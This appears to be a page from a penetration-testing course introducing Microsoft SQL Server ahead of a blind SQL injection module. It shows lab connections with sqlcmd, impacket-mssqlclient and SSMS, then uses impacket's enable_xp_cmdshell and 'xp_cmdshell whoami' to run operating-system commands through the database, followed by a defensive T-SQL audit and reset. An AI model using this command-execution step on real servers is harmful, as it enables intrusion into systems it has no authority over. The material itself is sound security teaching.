Blind SQL Injection
Introduction to MSSQL/SQL Server
Introduction
SQL is a standardized language for interacting with relational databases. The five most common (as of Dec 15, 2022) are:
In this module, we will be focusing on blind SQL injection attacks using examples in Microsoft SQL Server (MSSQL). In addition to this, we will cover MSSQL-specific attacks. As SQL is standardized, the attacks taught in this module may be easily adapted to work against other relational databases.
Interacting with MSSQL
Although we will be dealing with injection vulnerabilities through websites for the rest of this module, it is helpful to understand how to interact with MSSQL/SQL Server directly, be it through a command-line or GUI application.
Note: As this is an advanced SQL module, it is expected that you already understand the basics of SQL and are comfortable building queries yourself.
SQLCMD (Windows, Command Line)
SQLCMD is a command-line tool for Windows developed by Microsoft for interacting with MSSQL.
To connect to a SQL Server we can use the following syntax. In this case, we are connecting to the bsqlintro database on the server SQL01 with the credentials thomas:TopSecretPassword23!. The last flag (-W) removes trailing spaces, which makes the output a bit easier to read.
PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1>
To run SQL queries, enter them and then type GO (the default batch separator) on its own line to execute the batch. In this example, we list all tables, and then select the top 5 posts from the users table joined with the posts table.
PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1> SELECT *
2> FROM INFORMATION_SCHEMA.TABLES;
3> GO
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
bsqlintro dbo users BASE TABLE
bsqlintro dbo posts BASE TABLE
(2 rows affected)
1> SELECT TOP 5 users.firstName, users.lastName, posts.title
2> FROM users
3> JOIN posts
4> ON users.id=posts.authorId;
5> GO
firstName lastName title
--------- -------- -----
Edward Strong Voluptatem neque labore dolore velit ut.
David Ladieu Etincidunt etincidunt adipisci sed consectetur.
Natasha Ingham Aliquam quiquia velit non aliquam sed sit etincidunt.
Jessica Fitzpatrick Dolor porro quiquia labore numquam numquam sit.
Mary Evans Tempora sed velit consectetur labore consectetur.
(5 rows affected)
Impacket-MSSQLClient (Linux, Command Line)
MSSQLClient.py (or impacket-mssqlclient) is part of the Impacket toolset, which comes preinstalled on many security-focused Linux distributions. We can use it to interact with a remote MSSQL server without needing Windows.
The syntax to connect looks like this:
$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
We can run queries as usual:
$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------------------------------------------------- ----------------------------------------------------------- ----------------------------------------------------------- -----------------------------------------------------------
bsqlintro dbo users b'BASE TABLE'
bsqlintro dbo posts b'BASE TABLE'
SQL> SELECT TOP 5 users.firstName, users.lastName, posts.title FROM users JOIN posts ON users.id=posts.authorId;
firstName lastName title
----------------------------------------------------------- ----------------------------------------------------------- -----------------------------------------------------------
b'Edward' b'Strong' b'Voluptatem neque labore dolore velit ut.'
b'David' b'Ladieu' b'Etincidunt etincidunt adipisci sed consectetur.'
b'Natasha' b'Ingham' b'Aliquam quiquia velit non aliquam sed sit etincidunt.'
b'Jessica' b'Fitzpatrick' b'Dolor porro quiquia labore numquam numquam sit.'
b'Mary' b'Evans' b'Tempora sed velit consectetur labore consectetur.'
SQL> exit
Since MSSQLClient.py is a pen-testing tool, it has a couple of features that help when attacking MSSQL servers. For example, it can enable xp_cmdshell (via sp_configure, as the two "Configuration option ... changed" messages below show) and then use it to run operating system commands. We will cover this later on in the module.
$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(SQL01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
exitoutput
--------------------------------------------------------------------------------
NT SERVICE\mssqlserver
NULL
SQL> exit
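The enable_xp_cmdshell helper relies on sp_configure, which is what the two "Configuration option ... changed" messages report. As an added example that is not part of the original module, the T-SQL below shows how an administrator can audit that state from sqlcmd or SSMS and return it to the secure default (xp_cmdshell is off on a fresh SQL Server install); it assumes a login with the sysadmin role, which sp_configure requires.

```sql
-- Added example: audit and reset xp_cmdshell from a sysadmin session (sqlcmd or SSMS).
-- value_in_use is the effective setting; value is the pending one until RECONFIGURE runs.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
GO

-- Return to the secure default: disable xp_cmdshell, then hide advanced options again.
-- 'show advanced options' must be on before sp_configure will accept 'xp_cmdshell'.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO

-- Confirm: both rows should now report value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
GO
```

The first query is worth scheduling or feeding to monitoring, since an unexpected change of xp_cmdshell's value_in_use from 0 to 1 is a strong sign that someone with elevated database rights ran sp_configure.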
SQL Server Management Studio (Windows, GUI)
SQL Server Management Studio is a GUI tool developed by Microsoft for interacting with MSSQL. When launching the application, we are prompted to connect to a server:

After connecting, we can view the databases in the server by opening the Databases folder.

We can list the tables by opening the specific database, and then the Tables folder.

To run queries on a database we can right-click and select New Query.

We can enter queries into the new tab, and run by clicking Execute.
